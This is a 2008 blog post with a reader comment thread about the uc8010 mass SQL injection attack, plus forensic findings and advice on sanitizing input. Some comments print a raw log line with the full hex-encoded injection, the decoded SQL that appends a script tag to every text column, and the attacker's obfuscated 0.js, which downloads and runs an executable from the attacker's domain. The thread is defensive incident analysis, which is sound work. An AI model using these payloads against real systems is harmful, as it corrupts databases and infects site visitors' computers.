uc8010 is an SQL injection attack

02 January 2008
original post: a plea for help

I cannot find any information about this anywhere, but it happened to me and at least 76,800 others. Information is thin on the ground. If you know more please post it here.

As far as I can tell, the attack inserts <script src=http://?.uc8010.com/0.js></script> into all varchar and text fields in your SQL database.

For lazy people like me, it is proving to be a nightmare! I have traditionally been very relaxed about this kind of business, I guess I must be more careful from now on.

07 January 2008
update on uc8010(dot)com

The exploit has been exposed and described (see the comments below; very, very informative, or go straight to the post-mortem). Below you can find out HOW they did it and WHAT it did. There is no magic fix, you will most likely have to restore your data from a backup, and to prevent further attacks you should escape all querystring variables coming into your database.
Thanks very much to the guys who posted their findings here! Much appreciated.

The attack *is* malicious, and the potential payload is described here http://websmithrob.wordpress.com/ (or this http://isc.sans.org/diary.html?date=2008-01-04).

Also watch out for ucmal.com (122.224.146.246) which appears to be up to similiar tricks.

Advertisements

33 thoughts on “uc8010 is an SQL injection attack

  1. There’s no information available because of how new it is. The domain uc8010 has only been active since the 28th of December. I first ran into it on a site my company works with on the 30th. At that time, google was returning ~12,000 results.

    People adhering to the golden rules of DB/Web development would have been fine with this. Escape and filter everything coming from the client computer!

  2. Yes, I figured as much, any tips for fellow punters on how to stop this (in the short term) would be much appreciated. In the longer term I for one will certainly be following those golden rules. Do you for instance think there will be a patch issued by someone?

  3. No, there will not be a patch.

    When you think about it, there is nothing to ‘patch’. This is not a single software vulnerability, but instead a score of bad programming practices.

    My advice for the short term would be to run through all code involving client input, or input that can be modified at the client end (this includes forms and querystring variables) and ensure that it is sanitized. Strip HTML tags where they aren’t absolutely required, and escape absolutely everything going to the DB from those pages.

    I am currently in the process of examining server logs for an affected site, and am trying to pinpoint where the offensive code is originating from. This will help in deterring further problems from this source, but will do nothing against future attacks. The only long term solution is sound coding and testing practices…

    Best of luck to anyone involved, and feel free to contact me with any specific questions you may have.

  4. I found where this came from, and have cleaned up our data and find the door it was using. The easiest way to locate this from log entries is to look for EXEC(@S) or ;DECLARE. They ran this code about a dozen times in 3 days from the 28th – 30th.

  5. Sorry about all the mini-posts – I wanted to add that the post is a querystring post in our case and it contains the endcoded string – 003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F006E002E007500630038003000310030002E0063006F006D002F0030002E006A0073003E003C002F007300630072006900700074003E
    which decodes to

  6. It was the decode which was the script reference at the beginning of this thread.

    One more thing to note. My logs showed hits at:
    12/28 at 23:13 GMT
    12/29 at 20:12 GMT
    12/30 at 01:04 GMT

    I would be curious what others find and if they find another IP besides the one I did.

  7. I also found the IP you listed in my logs. (a quick way to find this info is to use the command prompt and the FIND command on your logfiles, this in a world without grep eh)

    My logs files also included:
    by=C%20ANd%20char(124)%2Buser%2Bchar(124)=0
    by=C%27%20ANd%20char(124)%2Buser%2Bchar(124)=0%20and%20%27%27=%27
    by=C%27%20ANd%20char(124)%2Buser%2Bchar(124)=0%20and%20%27%25%27=%27

    which i think decodes to

    by=C ANd char(124) user char(124)=0
    by=C' ANd char(124) user char(124)=0 and ''='
    by=C' ANd char(124) user char(124)=0 and '%'='

    the querystring “by=c”, was valid the rest is injected.

  8. Yes, I found those as well. There are also two attempts at the long command, the first is without the leading single quote and the second is with a leading single quote.

  9. Nice work guys.

    I would be curious to know whether these were requested via post from a form or not…?

    isaid – I know you said you’ve been a bit ‘relaxed’ about this stuff in the past, but it is interesting to see how much damage was caused and time wasted, when simply sanitizing your variable ‘by’ would have prevented it.

    Let this be a lesson to all!! Lol, again though… nice work sourcing it.

  10. 2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F0063002E007500630038003000310030002E0063006F006D002F0030002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);–|178|80040e14|Unclosed_quotation_mark_before_the_character_string_’G;DECLARE_@S_NVARCHAR(4000);SET_@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000′. – 202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) – 500 15248

  11. In my case, all three attacks were the same – 3 gets, trying to access sysadmin accounts, followed by 2 posts, one with the leading single quote, then one without.

  12. We got attacked by the same method at around the same time, someone in our team floated the idea that it was a method of doing a distributed DOS on the uc8010.com server by adding requests across thousands of high-traffic sites, but I guess if the domain has only been recently registered that’s probably a dead-end.

    The code in question was 5 years old and we’ve plugged it, but I’ve also installed WebKnight by Aqtronix http://www.aqtronix.com/?PageID=99 which guards against SQL Injection at the server level (it’s an ISAPI extension) for the moment – if anyone has any knowledge or feedback of this extension I’d be really grateful!

    My email address is email me some stuff at google mail dot com

    Cheers
    A

  13. I can show the content of the “0.js” file that is called by the injected script. As soon as a browser queries an infected table of your db the script redirects the brower and runs the following java code: [It seems to be harvesting cookies]
    ________________________________________

    function setCookie(name,value)
    {
    var Days = 1;
    var exp = new Date();
    exp.setTime(exp.getTime() + Days*30*60*1000);//Days*24*60*60*1000;
    document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
    }
    function getCookie(name)
    {
    var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
    if(arr != null)
    {
    return unescape(arr[2]);
    }
    else
    {
    document.writeln("");
    document.writeln("");
    setCookie("Lin","ok");
    return null;
    }
    }
    getCookie("Lin")

    eval("\146\165\156\143\164\151\157\156\40\147\156\50\162\122\141\107\105\171\153\125\61\51\15\12\173\15\12\166\141\162\40\117\162\150\62\75\167\151\156\144\157\167\133\42\115\141\164\150\42\135\133\42\162\141\156\144\157\155\42\135\50\51\52\162\122\141\107\105\171\153\125\61\73\15\12\162\145\164\165\162\156\47\176\164\155\160\47\53\47\56\164\155\160\47\15\12\175\15\12\146\165\156\143\164\151\157\156\40\104\157\167\156\105\50\106\151\154\145\125\122\114\54\114\157\143\141\154\106\151\154\145\51\15\12\173\15\12\164\162\171\15\12\173\15\12\166\151\160\75\106\151\154\145\125\122\114\73\15\12\166\141\162\40\143\150\145\156\172\151\75\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\42\157\142\152\145\143\164\42\51\73\15\12\143\150\145\156\172\151\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\42\143\154\141\163\163\151\144\42\54\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\51\73\15\12\166\141\162\40\160\163\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\115\114\110\124\124\120\42\54\42\42\51\73\15\12\166\141\162\40\154\157\166\145\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\101\144\157\144\142\56\123\164\162\145\141\155\42\54\42\42\51\73\15\12\154\157\166\145\133\42\164\171\160\145\42\135\75\61\73\15\12\160\163\133\42\157\160\145\156\42\135\50\42\107\105\124\42\54\166\151\160\54\60\51\73\15\12\160\163\133\42\163\145\156\144\42\135\50\51\73\15\12\143\150\151\156\141\75\147\156\50\61\60\60\60\60\51\53\114\157\143\141\154\106\151\154\145\73\15\12\166\141\162\40\150\110\146\44\122\66\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\143\162\151\160\164\151\156\147\56\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\54\42\42\51\73\15\12\166\141\162\40\126\147\104\156\132\130\110\164\67\75\150\110\146\44\122\66\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\15\12\143\150\151\156\141\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\54\143\150\151\156\141\51\73\15\12\154\157\166\145\133\42\117\160\145\156\42\135\50\51\73\15\12\154\157\166\145\133\42\127\162\151\164\145\42\135\50\160\163\133\42\162\145\163\160\157\156\163\145\102\157\144\171\42\135\51\73\15\12\154\157\166\145\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\143\150\151\156\141\54\62\51\73\15\12\154\157\166\145\133\42\103\154\157\163\145\42\135\50\51\73\15\12\166\141\162\40\123\155\101\143\161\111\167\107\126\70\75\143\150\145\156\172\151\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\15\12\145\170\160\61\75\150\110\146\44\122\66\133\42\102\165\151\154\144\120\141\164\150\42\135\50\126\147\104\156\132\130\110\164\67\53\47\134\134\163\171\163\164\145\155\63\62\47\54\47\143\155\144\56\145\170\145\47\51\73\15\12\123\155\101\143\161\111\167\107\126\70\133\42\123\150\145\154\154\105\170\145\143\165\164\145\42\135\50\145\170\160\61\54\47\40\57\143\40\47\53\143\150\151\156\141\54\42\42\54\42\157\160\145\156\42\54\60\51\175\143\141\164\143\150\50\151\51\173\151\75\61\175\15\12\175\15\12\104\157\167\156\105\50\42\150\164\164\160\72\57\57\143\56\165\143\70\60\61\60\56\143\157\155\57\162\156\155\142\57\60\57\61\56\145\170\145\42\54\42\61\71\56\145\170\145\42\51\73")

  14. Here is the actual SQL that is being injected.

    DECLARE @T varchar(255),@C varchar(255)
    DECLARE Table_Cursor
    CURSOR FOR

    select
    a.name,b.name
    from
    sysobjects a,
    syscolumns b
    where
    a.id=b.id
    and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

    OPEN Table_Cursor
    FETCH NEXT FROM
    Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
    exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor

    It will pull all text, ntext, nvarchar, and varchar fields for the DB and append the script tag to it. very easy to stop if you are not allowing selection against sysobjects.

  15. I’m not sure I understand the actual injection: If it used a querystring variable (“by”) that’s not expected by a particular app (and presumably never compared/used later in code), how does it affect the given site?

  16. That’s the anomalous part: nowhere in our (hacked) site did we make use of any variable called “by”. If we never pulled off that part of the querystring, how’d they hit us? (We’ve since hardened all parts of the site, but we’d also like to stop things right from the start…)

  17. One thought: Is it possible that the actual attack worked with a library of possible querystring parameters (e.g. “name”, “ID”, all the letters of the alphabet, etc.) and simply tried its attack string on all of them?

  18. Ugh! Found it (thanks for the folks who pointed out the relevant log search strings). It looks like they simply crawled the site, then appended the attack on top of the parameters they found while doing so. From there, the attack tried various combinations of characters until it found one that got through our filters.

  19. pbickford: Yes, I think you are right, I had my suspcicions it is an alphabet related attack, nothing wrong with using the alphabet per se, but once you see one it is a GOOD chance that this is going to be part of a dynamic SQL query, and ripe for attacking.

  20. yes good work guys I can confirm the above.

    by looking at the weblogs its done in the URL via SQL Injection as you say.

    What the above SQL does is iterate through every content tables text fields and append the harmful script to it.

    WHAT YOU DONT KNOW: NB! THE POINT!

    The uc8010 script is definitely malicious:
    it includes by means of iframes further scripts. You will find them if you look for them on the scripts site. Amongst other aribitrary files (to throw off the investigator) a malicious javascript script is there and is executed on the clients browser that takes advantage of a flaw in the way Real Player is able to import media files with information embedded in them.

    This attack has been called EXPL_REALPLAY.H or RealPlayer Exploit and probably many other names.

    If the correct payload is inserted into the Real Player these insructions can actually execute on the clients computer – it is still uncertain as to what is possible here.

    So, the result of this was that when someone views the page containing the scripts from your corrupted database the script tag is hidden in each text and immediately causes the browser to download the malicious script, which then if the user has the correct version of Real Player attempts to cause a buffer overflow and execute an unknown set of machine code.

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s